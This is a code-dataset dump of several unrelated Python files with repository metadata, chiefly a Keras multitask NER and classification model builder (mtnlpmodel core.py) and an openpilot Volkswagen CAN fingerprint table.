outputs = tf.reshape(self._final(outputs), [-1, self._global_params.num_classes])
self.endpoints['head'] = outputs
return outputs | 40.463964 | 117 | 0.567405 | 2,066 | 17,966 | 4.692159 | 0.107938 | 0.04085 | 0.049515 | 0.042913 | 0.824634 | 0.810605 | 0.779554 | 0.760883 | 0.737054 | 0.726326 | 0 | 0.03827 | 0.329511 | 17,966 | 444 | 118 | 40.463964 | 0.766479 | 0.115774 | 0 | 0.753799 | 0 | 0 | 0.031375 | 0 | 0 | 0 | 0 | 0 | 0.006079 | 1 | 0.030395 | false | 0 | 0.012158 | 0 | 0.06383 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8cd072bf4003a6fd4f6062acafc04792266b1923 | 83 | py | Python | taxicab/__init__.py | nathanrooy/taxicab | 8d473b4b4350d0adeff7c0696c378525d39b131e | [
"MIT"
] | 11 | 2021-04-19T16:55:29.000Z | 2022-03-03T10:58:57.000Z | taxicab/__init__.py | nathanrooy/taxicab | 8d473b4b4350d0adeff7c0696c378525d39b131e | [
"MIT"
] | 7 | 2021-02-21T20:42:28.000Z | 2022-01-20T11:54:59.000Z | taxicab/__init__.py | nathanrooy/taxicab | 8d473b4b4350d0adeff7c0696c378525d39b131e | [
"MIT"
] | 2 | 2021-07-27T12:12:12.000Z | 2021-12-15T16:49:50.000Z | from ._about import __version__
from ._about import __author__
from ._api import *
| 20.75 | 31 | 0.807229 | 11 | 83 | 5.090909 | 0.545455 | 0.321429 | 0.535714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.144578 | 83 | 3 | 32 | 27.666667 | 0.788732 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
5080d1881a3e3f6afe2b820f53be6a86a30fc891 | 31,060 | py | Python | mtnlpmodel/core.py | xiaomihao/mtnlpmodel | ff97acd5e37d12dca931b425e8d1d5b2054ab019 | [
"Apache-2.0"
] | 3 | 2020-06-24T09:03:05.000Z | 2021-11-04T05:34:09.000Z | build/lib/mtnlpmodel/core.py | xiaomihao/mtnlpmodel | ff97acd5e37d12dca931b425e8d1d5b2054ab019 | [
"Apache-2.0"
] | 11 | 2020-09-26T01:14:53.000Z | 2022-03-12T00:36:47.000Z | mtnlpmodel/core.py | xiaomihao/mtnlpmodel | ff97acd5e37d12dca931b425e8d1d5b2054ab019 | [
"Apache-2.0"
] | 1 | 2020-06-29T01:47:41.000Z | 2020-06-29T01:47:41.000Z | import os
import tensorflow as tf
from tensorflow.keras import Input
from tensorflow.keras.models import Model
from tensorflow.keras.layers import (Embedding,
Flatten,
Dropout,
Dense,
Lambda,
Bidirectional,
LSTM,
LayerNormalization,)
from tf_crf_layer.layer import CRF
from tf_attention_layer.layers.global_attentioin_layer import GlobalAttentionLayer
from mtnlpmodel.utils.model_util import Mish
def cls_branch_single_input(arcloss_param, output_dims, feature_extractor, emb_layer, outputlayer_name='cls'):
if arcloss_param: # for arc-softmax loss
from mtnlpmodel.utils.model_util import ArcFace
with tf.keras.backend.name_scope("CLS_branch"):
# cls branch
cls_feature_layer = feature_extractor(emb_layer)
cls_flat_lstm = Flatten()(cls_feature_layer)
cls_flat = Dropout(0.25)(cls_flat_lstm)
cls_vec_layer = Dense(128, name='arc_vector', activation='linear')
cls_vector = cls_vec_layer(cls_flat)
cls_vector = Mish()(cls_vector)
cls_layer = ArcFace(output_dims, margin=0.2, name=outputlayer_name)
cls_arc = cls_layer(cls_vector)
cls_output = cls_arc
# ner cls branch
ner_cls_layer = cls_arc
else: # for softmax loss
with tf.keras.backend.name_scope("CLS_branch"):
# cls branch
cls_feature_layer = feature_extractor(emb_layer)
cls_flat_lstm = Flatten()(cls_feature_layer)
cls_flat = Dropout(0.25)(cls_flat_lstm)
cls_dense = Dense(output_dims, activation='softmax', name=outputlayer_name)
cls_output = cls_dense(cls_flat)
cls_vector = cls_output
# ner cls branch
ner_cls_layer = cls_vector
return ner_cls_layer, cls_output, cls_vector, cls_feature_layer
def cls_branch(arcloss_param, output_dims, feature_extractor, cls_emb_layer, ner_emb_layer=None, outputlayer_name='cls'):
if arcloss_param: # for arc-softmax loss
from mtnlpmodel.utils.model_util import ArcFace
with tf.keras.backend.name_scope("CLS_branch"):
# cls branch
cls_feature_layer = feature_extractor(cls_emb_layer)
cls_flat_lstm = Flatten()(cls_feature_layer)
cls_flat = Dropout(0.25)(cls_flat_lstm)
cls_vec_layer = Dense(128, name='arc_vector', activation='linear')
cls_vector = cls_vec_layer(cls_flat)
cls_vector = Mish()(cls_vector)
cls_layer = ArcFace(output_dims, margin=0.2, name=outputlayer_name)
cls_arc = cls_layer(cls_vector)
cls_output = cls_arc
# ner cls branch
if ner_emb_layer is not None:
ner_cls_feature_layer = feature_extractor(ner_emb_layer)
ner_cls_flat_lstm = Flatten()(ner_cls_feature_layer)
ner_cls_vec_layer = cls_vec_layer(ner_cls_flat_lstm)
ner_cls_layer = cls_layer(ner_cls_vec_layer)
else:
ner_cls_layer = None
else: # for softmax loss
with tf.keras.backend.name_scope("CLS_branch"):
# cls branch
cls_feature_layer = feature_extractor(cls_emb_layer)
cls_flat_lstm = Flatten()(cls_feature_layer)
cls_flat = Dropout(0.25)(cls_flat_lstm)
cls_dense = Dense(output_dims, activation='softmax', name=outputlayer_name)
cls_output = cls_dense(cls_flat)
cls_vector = cls_output
# ner cls branch
if ner_emb_layer is not None:
ner_cls_feature_layer = feature_extractor(ner_emb_layer)
ner_cls_flat_lstm = Flatten()(ner_cls_feature_layer)
ner_cls_layer = cls_dense(ner_cls_flat_lstm)
else:
ner_cls_layer = None
return ner_cls_layer, cls_output, cls_vector
def build_model_single_input(model_choice, **hyperparams):
from mtnlpmodel.utils.model_util import (get_ner_cls_output_tensor_merge_embedding,
get_ner_cls_output_tensor_merge_input)
# get hyperparams
EMBED_DIM = hyperparams['EMBED_DIM']
CRF_PARAMS = hyperparams['CRF_PARAMS']
BiLSTM_STACK_CONFIG = hyperparams['BiLSTM_STACK_CONFIG']
CLS2NER_KEYWORD_LEN = hyperparams['CLS2NER_KEYWORD_LEN']
USE_ATTENTION_LAYER = hyperparams['USE_ATTENTION_LAYER']
tag_size = hyperparams['ner_tag_lookuper'].size()
label_size = hyperparams['cls_label_lookuper'].size()
vocab_size = hyperparams['vocabulary_lookuper'].size()
# input layer
input_length = hyperparams['MAX_SENTENCE_LEN']
input_layer = Input(shape=(input_length,), dtype='int32', name='input')
# encoder
if model_choice == 'VIRTUAL_EMBEDDING': # cls_out embedding merged to ner_input_embedding as virtual embedding
from mtnlpmodel.utils.model_util import VirtualEmbedding, Discriminator_new
with tf.keras.backend.name_scope("Encoder"):
embedding_layer_vocab = Embedding(vocab_size,
EMBED_DIM,
mask_zero=True,
input_length=input_length,
name='embedding_vocab'
)
embedding_layer_virtual = VirtualEmbedding(label_size,
EMBED_DIM,
mask_zero=True,
input_length=CLS2NER_KEYWORD_LEN,
mask_length=CLS2NER_KEYWORD_LEN,
name='embedding_virtual',
)
embedding = embedding_layer_vocab(input_layer)
embedding = Dropout(0.15)(embedding) # just like random erase
with tf.keras.backend.name_scope("Feature_extractor"):
for bilstm_config in BiLSTM_STACK_CONFIG:
biLSTM = Bidirectional(LSTM(return_sequences=True, **bilstm_config, name='biLSTM'))
bilstm_extrator = biLSTM
# classification branch
ner_cls_layer, cls_output, cls_vector, _ = cls_branch_single_input(hyperparams['Arcloss'],
label_size, bilstm_extrator,
embedding,
outputlayer_name='cls')
ner_cls_output_shape = get_ner_cls_output_tensor_merge_embedding(CLS2NER_KEYWORD_LEN)(ner_cls_layer).shape
ner_cls_output_layer = Lambda(get_ner_cls_output_tensor_merge_embedding(CLS2NER_KEYWORD_LEN),
ner_cls_output_shape)(ner_cls_layer)
# classification output will be used as a keyword adding to input of NER
discriminator = Discriminator_new(onetask_output_shape=(CLS2NER_KEYWORD_LEN,),
output_dtype='int32')
ner_cls_input_layer = discriminator(ner_cls_output_layer)
ner_virtual_embedding = embedding_layer_virtual(ner_cls_input_layer)
ner_merged_embedding = tf.keras.layers.concatenate([ner_virtual_embedding, embedding], axis=1)
ner_branch_embedding = ner_merged_embedding
ner_feature_layer = None
elif model_choice=='CLS2NER_INPUT': # cls_out merged to ner_input as virtual keywords
from mtnlpmodel.utils.model_util import Discriminator
from mtnlpmodel.utils.input_process_util import build_vacablookuper_from_list
vocabs = list(hyperparams['vocabulary_lookuper'].inverse_index_table.values())
cls_labels = list(hyperparams['cls_label_lookuper'].inverse_index_table.values())
vocabs.extend(cls_labels)
vocabulary_lookuper = build_vacablookuper_from_list(*vocabs)
vocab_size = vocabulary_lookuper.size()
with tf.keras.backend.name_scope("Encoder"):
embedding_layer = Embedding(vocab_size,
EMBED_DIM,
mask_zero=True,
input_length=input_length,
)
embedding = embedding_layer(input_layer)
embedding = Dropout(0.15)(embedding) # just like random erase
with tf.keras.backend.name_scope("Feature_extractor"):
for bilstm_config in BiLSTM_STACK_CONFIG:
biLSTM = Bidirectional(LSTM(return_sequences=True, **bilstm_config, name='biLSTM'))
bilstm_extrator = biLSTM
# classification branch
ner_cls_layer, cls_output, cls_vector, _ = cls_branch_single_input(hyperparams['Arcloss'],
label_size, bilstm_extrator, embedding,
outputlayer_name='cls')
ner_cls_output_shape = get_ner_cls_output_tensor_merge_input(CLS2NER_KEYWORD_LEN,
**{"vocab_size":vocab_size,
"label_size":label_size})(ner_cls_layer).shape
ner_cls_output_layer = Lambda(get_ner_cls_output_tensor_merge_input(
CLS2NER_KEYWORD_LEN,
**{"vocab_size": vocab_size, "label_size": label_size}),
ner_cls_output_shape)(ner_cls_layer)
# classification output will be used as a keyword adding to input of NER
discriminator = Discriminator(input_layer, onetask_output_shape=(CLS2NER_KEYWORD_LEN,),
output_dtype='int32')
merged_ner_input_layer = discriminator([ner_cls_output_layer, input_layer])
ner_branch_embedding = embedding_layer(merged_ner_input_layer)
ner_feature_layer = None
else: # task independent
with tf.keras.backend.name_scope("Encoder"):
embedding_layer = Embedding(vocab_size,
EMBED_DIM,
mask_zero=True,
input_length=input_length,
)
embedding = embedding_layer(input_layer)
embedding = Dropout(0.15)(embedding) # just like random erase
with tf.keras.backend.name_scope("Feature_extractor"):
for bilstm_config in BiLSTM_STACK_CONFIG:
biLSTM = Bidirectional(LSTM(return_sequences=True, **bilstm_config, name='biLSTM'))
bilstm_extrator = biLSTM
# classification branch
_, cls_output, cls_vector, cls_feature_layer = cls_branch_single_input(hyperparams['Arcloss'],
label_size, bilstm_extrator,
embedding, outputlayer_name='cls')
ner_branch_embedding = embedding
ner_feature_layer = cls_feature_layer
# NER branch
with tf.keras.backend.name_scope("NER_branch"):
if ner_feature_layer is None:
# print_op = tf.print(ner_virtual_embedding._keras_mask, ner_embedding._keras_mask)
# with tf.control_dependencies([print_op]):
embedding_layer = LayerNormalization()(ner_branch_embedding)
biLSTM = bilstm_extrator(embedding_layer)
biLSTM = LayerNormalization()(biLSTM)
if USE_ATTENTION_LAYER:
biLSTM = GlobalAttentionLayer()(biLSTM)
ner_output = CRF(tag_size, name="crf", **CRF_PARAMS)(biLSTM)
else:
biLSTM = ner_feature_layer
biLSTM = LayerNormalization()(biLSTM)
if USE_ATTENTION_LAYER:
biLSTM = GlobalAttentionLayer()(biLSTM)
ner_output = CRF(tag_size, name="crf", **CRF_PARAMS)(biLSTM)
# merge NER and Classification
model = Model(inputs=[input_layer], outputs=[ner_output, cls_output])
semantic_vector = Model(inputs=[input_layer], outputs=cls_vector)
return model, semantic_vector
def build_model_multi_input(model_choice, **hyperparams):
from mtnlpmodel.utils.model_util import (get_ner_cls_output_tensor_merge_embedding,
get_ner_cls_output_tensor_merge_input)
# get hyperparams
EMBED_DIM = hyperparams['EMBED_DIM']
CRF_PARAMS = hyperparams['CRF_PARAMS']
BiLSTM_STACK_CONFIG = hyperparams['BiLSTM_STACK_CONFIG']
CLS2NER_KEYWORD_LEN = hyperparams['CLS2NER_KEYWORD_LEN']
USE_ATTENTION_LAYER = hyperparams['USE_ATTENTION_LAYER']
tag_size = hyperparams['ner_tag_lookuper'].size()
label_size = hyperparams['cls_label_lookuper'].size()
vocab_size = hyperparams['vocabulary_lookuper'].size()
# input layer
input_length = hyperparams['MAX_SENTENCE_LEN']
ner_input_layer = Input(shape=(input_length,), dtype='int32', name='ner_input')
cls_input_layer = Input(shape=(input_length,), dtype='int32', name='cls_input')
# encoder
if model_choice=='VIRTUAL_EMBEDDING': # cls_out embedding merged to ner_input_embedding as virtual embedding
from mtnlpmodel.utils.model_util import VirtualEmbedding, Discriminator_new
with tf.keras.backend.name_scope("Encoder"):
embedding_layer_vocab = Embedding(vocab_size,
EMBED_DIM,
mask_zero=True,
input_length=input_length,
name='embedding_vocab'
)
embedding_layer_virtual = VirtualEmbedding(label_size,
EMBED_DIM,
mask_zero=True,
input_length=CLS2NER_KEYWORD_LEN,
mask_length=CLS2NER_KEYWORD_LEN,
name='embedding_virtual',
)
ner_embedding = embedding_layer_vocab(ner_input_layer)
cls_embedding = embedding_layer_vocab(cls_input_layer)
ner_embedding = Dropout(0.15)(ner_embedding) # just like random erase
cls_embedding = Dropout(0.15)(cls_embedding)
with tf.keras.backend.name_scope("Feature_extractor"):
for bilstm_config in BiLSTM_STACK_CONFIG:
biLSTM = Bidirectional(LSTM(return_sequences=True, **bilstm_config, name='biLSTM'))
bilstm_extrator = biLSTM
# classification branch
ner_cls_layer, cls_output, cls_vector = cls_branch(hyperparams['Arcloss'],
label_size, bilstm_extrator,
cls_embedding, ner_embedding,
outputlayer_name='cls')
ner_cls_output_shape = get_ner_cls_output_tensor_merge_embedding(CLS2NER_KEYWORD_LEN)(ner_cls_layer).shape
ner_cls_output_layer = Lambda(get_ner_cls_output_tensor_merge_embedding(CLS2NER_KEYWORD_LEN), ner_cls_output_shape)(ner_cls_layer)
# classification output will be used as a keyword adding to input of NER
discriminator = Discriminator_new(onetask_output_shape=(CLS2NER_KEYWORD_LEN,),
output_dtype='int32')
ner_cls_input_layer = discriminator(ner_cls_output_layer)
ner_virtual_embedding = embedding_layer_virtual(ner_cls_input_layer)
ner_merged_embedding = tf.keras.layers.concatenate([ner_virtual_embedding, ner_embedding], axis=1)
ner_branch_embedding = ner_merged_embedding
elif model_choice=='CLS2NER_INPUT': # cls_out merged to ner_input as virtual keywords
from mtnlpmodel.utils.model_util import Discriminator
from mtnlpmodel.utils.input_process_util import build_vacablookuper_from_list
vocabs = list(hyperparams['vocabulary_lookuper'].inverse_index_table.values())
cls_labels = list(hyperparams['cls_label_lookuper'].inverse_index_table.values())
vocabs.extend(cls_labels)
vocabulary_lookuper = build_vacablookuper_from_list(*vocabs)
vocab_size = vocabulary_lookuper.size()
with tf.keras.backend.name_scope("Encoder"):
embedding_layer = Embedding(vocab_size,
EMBED_DIM,
mask_zero=True,
input_length=input_length,
)
ner_embedding = embedding_layer(ner_input_layer)
cls_embedding = embedding_layer(cls_input_layer)
ner_embedding = Dropout(0.15)(ner_embedding) # just like random erase
cls_embedding = Dropout(0.15)(cls_embedding)
with tf.keras.backend.name_scope("Feature_extractor"):
for bilstm_config in BiLSTM_STACK_CONFIG:
biLSTM = Bidirectional(LSTM(return_sequences=True, **bilstm_config, name='biLSTM'))
bilstm_extrator = biLSTM
# classification branch
ner_cls_layer, cls_output, cls_vector = cls_branch(hyperparams['Arcloss'],
label_size, bilstm_extrator,
cls_embedding, ner_embedding,
outputlayer_name='cls')
ner_cls_output_shape = get_ner_cls_output_tensor_merge_input(CLS2NER_KEYWORD_LEN,
**{"vocab_size":vocab_size,
"label_size":label_size})(ner_cls_layer).shape
ner_cls_output_layer = Lambda(get_ner_cls_output_tensor_merge_input(
CLS2NER_KEYWORD_LEN,
**{"vocab_size": vocab_size, "label_size": label_size}),
ner_cls_output_shape)(ner_cls_layer)
# classification output will be used as a keyword adding to input of NER
discriminator = Discriminator(ner_input_layer, onetask_output_shape=(CLS2NER_KEYWORD_LEN,),
output_dtype='int32')
merged_ner_input_layer = discriminator([ner_cls_output_layer, ner_input_layer])
ner_branch_embedding = embedding_layer(merged_ner_input_layer)
else: # task independent
with tf.keras.backend.name_scope("Encoder"):
embedding_layer = Embedding(vocab_size,
EMBED_DIM,
mask_zero=True,
input_length=input_length,
)
ner_embedding = embedding_layer(ner_input_layer)
cls_embedding = embedding_layer(cls_input_layer)
ner_embedding = Dropout(0.15)(ner_embedding) # just like random erase
cls_embedding = Dropout(0.15)(cls_embedding)
with tf.keras.backend.name_scope("Feature_extractor"):
for bilstm_config in BiLSTM_STACK_CONFIG:
biLSTM = Bidirectional(LSTM(return_sequences=True, **bilstm_config, name='biLSTM'))
bilstm_extrator = biLSTM
# classification branch
_, cls_output, cls_vector = cls_branch(hyperparams['Arcloss'],
label_size, bilstm_extrator,
cls_embedding, outputlayer_name='cls')
ner_branch_embedding = ner_embedding
# NER branch
with tf.keras.backend.name_scope("NER_branch"):
# print_op = tf.print(ner_virtual_embedding._keras_mask, ner_embedding._keras_mask)
# with tf.control_dependencies([print_op]):
embedding_layer = LayerNormalization()(ner_branch_embedding)
biLSTM = bilstm_extrator(embedding_layer)
biLSTM = LayerNormalization()(biLSTM)
if USE_ATTENTION_LAYER:
biLSTM = GlobalAttentionLayer()(biLSTM)
ner_output = CRF(tag_size, name="crf", **CRF_PARAMS)(biLSTM)
# merge NER and Classification
model = Model(inputs=[ner_input_layer, cls_input_layer], outputs=[ner_output, cls_output])
semantic_vector = Model(inputs=[ner_input_layer, cls_input_layer], outputs=cls_vector)
return model, semantic_vector
def finetune_model(model_choice, model_weights_path, freeze_list, **hyperparams):
from mtnlpmodel.utils.model_util import (get_ner_cls_output_tensor_merge_embedding,
get_ner_cls_output_tensor_merge_input)
# get hyperparams
EMBED_DIM = hyperparams['EMBED_DIM']
CRF_PARAMS = hyperparams['CRF_PARAMS']
BiLSTM_STACK_CONFIG = hyperparams['BiLSTM_STACK_CONFIG']
CLS2NER_KEYWORD_LEN = hyperparams['CLS2NER_KEYWORD_LEN']
USE_ATTENTION_LAYER = hyperparams['USE_ATTENTION_LAYER']
tag_size = hyperparams['ner_tag_lookuper'].size()
label_size = hyperparams['cls_label_lookuper'].size()
vocab_size = hyperparams['vocabulary_lookuper'].size()
# input layer
input_length = hyperparams['MAX_SENTENCE_LEN']
input_layer = Input(shape=(input_length,), dtype='int32', name='input')
# encoder
if model_choice == 'VIRTUAL_EMBEDDING': # cls_out embedding merged to ner_input_embedding as virtual embedding
from mtnlpmodel.utils.model_util import VirtualEmbedding, Discriminator_new
with tf.keras.backend.name_scope("Encoder"):
embedding_layer_vocab = Embedding(vocab_size,
EMBED_DIM,
mask_zero=True,
input_length=input_length,
name='embedding_vocab'
)
embedding_layer_virtual = VirtualEmbedding(label_size,
EMBED_DIM,
mask_zero=True,
input_length=CLS2NER_KEYWORD_LEN,
mask_length=CLS2NER_KEYWORD_LEN,
name='embedding_virtual',
)
embedding = embedding_layer_vocab(input_layer)
embedding = Dropout(0.15)(embedding) # just like random erase
with tf.keras.backend.name_scope("Feature_extractor"):
for bilstm_config in BiLSTM_STACK_CONFIG:
biLSTM = Bidirectional(LSTM(return_sequences=True, **bilstm_config, name='biLSTM'))
bilstm_extrator = biLSTM
# classification branch
ner_cls_layer, cls_output, cls_vector, _ = cls_branch_single_input(hyperparams['Arcloss'],
label_size, bilstm_extrator,
embedding,
outputlayer_name='cls_')
ner_cls_output_shape = get_ner_cls_output_tensor_merge_embedding(CLS2NER_KEYWORD_LEN)(ner_cls_layer).shape
ner_cls_output_layer = Lambda(get_ner_cls_output_tensor_merge_embedding(CLS2NER_KEYWORD_LEN),
ner_cls_output_shape)(ner_cls_layer)
# classification output will be used as a keyword adding to input of NER
discriminator = Discriminator_new(onetask_output_shape=(CLS2NER_KEYWORD_LEN,),
output_dtype='int32')
ner_cls_input_layer = discriminator(ner_cls_output_layer)
ner_virtual_embedding = embedding_layer_virtual(ner_cls_input_layer)
ner_merged_embedding = tf.keras.layers.concatenate([ner_virtual_embedding, embedding], axis=1)
ner_branch_embedding = ner_merged_embedding
ner_feature_layer = None
elif model_choice=='CLS2NER_INPUT': # cls_out merged to ner_input as virtual keywords
from mtnlpmodel.utils.model_util import Discriminator
from mtnlpmodel.utils.input_process_util import build_vacablookuper_from_list
vocabs = list(hyperparams['vocabulary_lookuper'].inverse_index_table.values())
cls_labels = list(hyperparams['cls_label_lookuper'].inverse_index_table.values())
vocabs.extend(cls_labels)
vocabulary_lookuper = build_vacablookuper_from_list(*vocabs)
vocab_size = vocabulary_lookuper.size()
with tf.keras.backend.name_scope("Encoder"):
embedding_layer = Embedding(vocab_size,
EMBED_DIM,
mask_zero=True,
input_length=input_length,
)
embedding = embedding_layer(input_layer)
embedding = Dropout(0.15)(embedding) # just like random erase
with tf.keras.backend.name_scope("Feature_extractor"):
for bilstm_config in BiLSTM_STACK_CONFIG:
biLSTM = Bidirectional(LSTM(return_sequences=True, **bilstm_config, name='biLSTM'))
bilstm_extrator = biLSTM
# classification branch
ner_cls_layer, cls_output, cls_vector, _ = cls_branch_single_input(hyperparams['Arcloss'],
label_size, bilstm_extrator, embedding,
outputlayer_name='cls_')
ner_cls_output_shape = get_ner_cls_output_tensor_merge_input(CLS2NER_KEYWORD_LEN,
**{"vocab_size":vocab_size,
"label_size":label_size})(ner_cls_layer).shape
ner_cls_output_layer = Lambda(get_ner_cls_output_tensor_merge_input(
CLS2NER_KEYWORD_LEN,
**{"vocab_size": vocab_size, "label_size": label_size}),
ner_cls_output_shape)(ner_cls_layer)
# classification output will be used as a keyword adding to input of NER
discriminator = Discriminator(input_layer, onetask_output_shape=(CLS2NER_KEYWORD_LEN,),
output_dtype='int32')
merged_ner_input_layer = discriminator([ner_cls_output_layer, input_layer])
ner_branch_embedding = embedding_layer(merged_ner_input_layer)
ner_feature_layer = None
else: # task independent
with tf.keras.backend.name_scope("Encoder"):
embedding_layer = Embedding(vocab_size,
EMBED_DIM,
mask_zero=True,
input_length=input_length,
)
embedding = embedding_layer(input_layer)
embedding = Dropout(0.15)(embedding) # just like random erase
with tf.keras.backend.name_scope("Feature_extractor"):
for bilstm_config in BiLSTM_STACK_CONFIG:
biLSTM = Bidirectional(LSTM(return_sequences=True, **bilstm_config, name='biLSTM'))
bilstm_extrator = biLSTM
# classification branch
_, cls_output, cls_vector, cls_feature_layer = cls_branch_single_input(hyperparams['Arcloss'],
label_size, bilstm_extrator,
embedding, outputlayer_name='cls_')
ner_branch_embedding = embedding
ner_feature_layer = cls_feature_layer
# NER branch
with tf.keras.backend.name_scope("NER_branch"):
if ner_feature_layer is None:
# print_op = tf.print(ner_virtual_embedding._keras_mask, ner_embedding._keras_mask)
# with tf.control_dependencies([print_op]):
embedding_layer = LayerNormalization()(ner_branch_embedding)
biLSTM = bilstm_extrator(embedding_layer)
biLSTM = LayerNormalization()(biLSTM)
if USE_ATTENTION_LAYER:
biLSTM = GlobalAttentionLayer()(biLSTM)
ner_output = CRF(tag_size, name="crf_", **CRF_PARAMS)(biLSTM)
else:
biLSTM = ner_feature_layer
biLSTM = LayerNormalization()(biLSTM)
if USE_ATTENTION_LAYER:
biLSTM = GlobalAttentionLayer()(biLSTM)
ner_output = CRF(tag_size, name="crf_", **CRF_PARAMS)(biLSTM)
# merge NER and Classification
model = Model(inputs=[input_layer], outputs=[ner_output, cls_output])
semantic_vector = Model(inputs=[input_layer], outputs=cls_vector)
freeze_layers = [layer for layer in model.layers if layer.name in freeze_list]
trainable_layers = [layer for layer in model.layers if layer.name not in freeze_list]
for layer in freeze_layers:
layer.trainable = False
for layer in trainable_layers:
layer.trainable = True
model.load_weights(model_weights_path, by_name=True)
return model, semantic_vector
def get_freeze_list_for_finetuning(model_choice):
'''Different structure models have different layers and layer names,
through this func to get the corresponding recommendation frozen list.
Layers in frozen_list are not trainable during the finetuning process.
You can modify the return list to customize your own frozen list.
'''
if model_choice=='VIRTUAL_EMBEDDING':
return ['bidirectional', 'embedding_vocab']
elif model_choice=='CLS2NER_INPUT':
return ['bidirectional']
else:
return ['embedding', 'bidirectional']
def finetuning_logger(*args):
print('Fine-tuning processing: ')
for arg in args:
try:
if os.path.split(arg)[-1].startswith('weights'):
print('Load model weights from {}'.format(arg))
except:
if isinstance(arg, list):
print('Frozen list is [{}]'.format(', '.join(arg))) | 52.466216 | 138 | 0.592273 | 3,184 | 31,060 | 5.380653 | 0.059359 | 0.03082 | 0.029419 | 0.026267 | 0.925811 | 0.915363 | 0.908942 | 0.90223 | 0.897794 | 0.887754 | 0 | 0.005654 | 0.339472 | 31,060 | 592 | 139 | 52.466216 | 0.829401 | 0.073664 | 0 | 0.83592 | 0 | 0 | 0.0559 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.015521 | false | 0 | 0.04878 | 0 | 0.08204 | 0.006652 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
50871572b2f94654715ea0bd826aa4310ee272c7 | 2,357 | py | Python | selfdrive/car/vw/values.py | micksmi/openpilot | 15e128d08cf6fcbb12bb9c665b711f16f75a4e5a | [
"MIT"
] | null | null | null | selfdrive/car/vw/values.py | micksmi/openpilot | 15e128d08cf6fcbb12bb9c665b711f16f75a4e5a | [
"MIT"
] | null | null | null | selfdrive/car/vw/values.py | micksmi/openpilot | 15e128d08cf6fcbb12bb9c665b711f16f75a4e5a | [
"MIT"
] | null | null | null | from selfdrive.car import dbc_dict
class CAR:
GOLF = "2018 VW Golf R"
ATLAS = "2018 VW Atlas SEL Premium"
OCTAVIA = "Skoda Octavia"
FINGERPRINTS = {
CAR.GOLF: [
{64: 8, 134: 8, 159: 8, 173: 8, 178: 8, 253: 8, 257: 8, 260: 8, 262: 8, 264: 8, 278: 8, 279: 8, 283: 8, 286: 8,
288: 8, 289: 8, 290: 8, 294: 8, 299: 8, 302: 8, 346: 8, 418: 8, 427: 8, 679: 8, 681: 8, 695: 8, 779: 8, 780: 8,
783: 8, 792: 8, 795: 8, 804: 8, 806: 8, 807: 8, 808: 8, 809: 8, 870: 8, 896: 8, 897: 8, 898: 8, 901: 8, 917: 8,
919: 8, 949: 8, 958: 8, 960: 4, 981: 8, 987: 8, 988: 8, 991: 8, 997: 8, 1000: 8, 1019: 8, 1122: 8, 1123: 8,
1124: 8, 1153: 8, 1162: 8, 1175: 8, 1312: 8, 1385: 8, 1413: 8, 1440: 5, 1514: 8, 1515: 8, 1520: 8, 1600: 8,
1601: 8, 1603: 8, 1605: 8, 1624: 8, 1626: 8, 1629: 8, 1631: 8, 1646: 8, 1648: 8, 1712: 6, 1714: 8, 1716: 8,
1717: 8, 1719: 8, 1720: 8, 1721: 8, 1792: 8
},
],
CAR.ATLAS: [
{64: 8, 134: 8, 159: 8, 173: 8, 178: 8, 253: 8, 257: 8, 260: 8, 262: 8, 278: 8, 279: 8, 283: 8, 286: 8, 288: 8,
289: 8, 290: 8, 294: 8, 299: 8, 302: 8, 346: 8, 418: 8, 427: 8, 679: 8, 681: 8, 695: 8, 779: 8, 780: 8, 783: 8,
792: 8, 804: 8, 806: 8, 807: 8, 808: 8, 809: 8, 870: 8, 896: 8, 897: 8, 898: 8, 901: 8, 917: 8, 919: 8, 927: 8,
949: 8, 958: 8, 960: 4, 981: 8, 987: 8, 988: 8, 991: 8, 997: 8, 1000: 8, 1019: 8, 1122: 8, 1123: 8, 1124: 8,
1153: 8, 1162: 8, 1175: 8, 1312: 8, 1351: 8, 1385: 8, 1413: 8, 1440: 5, 1514: 8, 1515: 8, 1520: 8, 1600: 8,
1601: 8, 1603: 8, 1605: 8, 1624: 8, 1629: 8, 1631: 8, 1646: 8, 1648: 8, 1712: 6, 1714: 8, 1716:8, 1717: 8,
1719: 8, 1720: 8, 1721: 8, 1792: 8
},
],
CAR.OCTAVIA: [
{64: 8, 134: 8, 159: 8, 173: 8, 178: 8, 253: 8, 257: 8, 262: 8, 278: 8, 279: 8, 285: 8, 286: 8, 288: 8, 289: 8,
290: 8, 299: 8, 302: 8, 427: 8, 779: 8, 780: 8, 804: 8, 870: 8, 901: 8, 917: 8, 929: 8, 930: 8, 949: 8, 958: 8,
960: 4, 981: 8, 987: 8, 988: 8, 991: 8, 997: 8, 1153: 8, 1175: 8, 1312: 8, 1385: 8, 1413: 8, 1440: 5, 1514: 8,
1515: 8, 1520: 8, 1600: 8, 1601: 8, 1603: 8, 1624: 8, 1629: 8, 1631: 8, 1646: 8, 1648: 8, 1712: 6, 1714: 8,
1716: 8, 1717: 8, 1719: 8, 1720: 8
},
],
}
DBC = {
CAR.GOLF: dbc_dict('vw_mqb_2010', None),
CAR.ATLAS: dbc_dict('vw_mqb_2010', None),
CAR.OCTAVIA: dbc_dict('vw_mqb_2010', None),
}
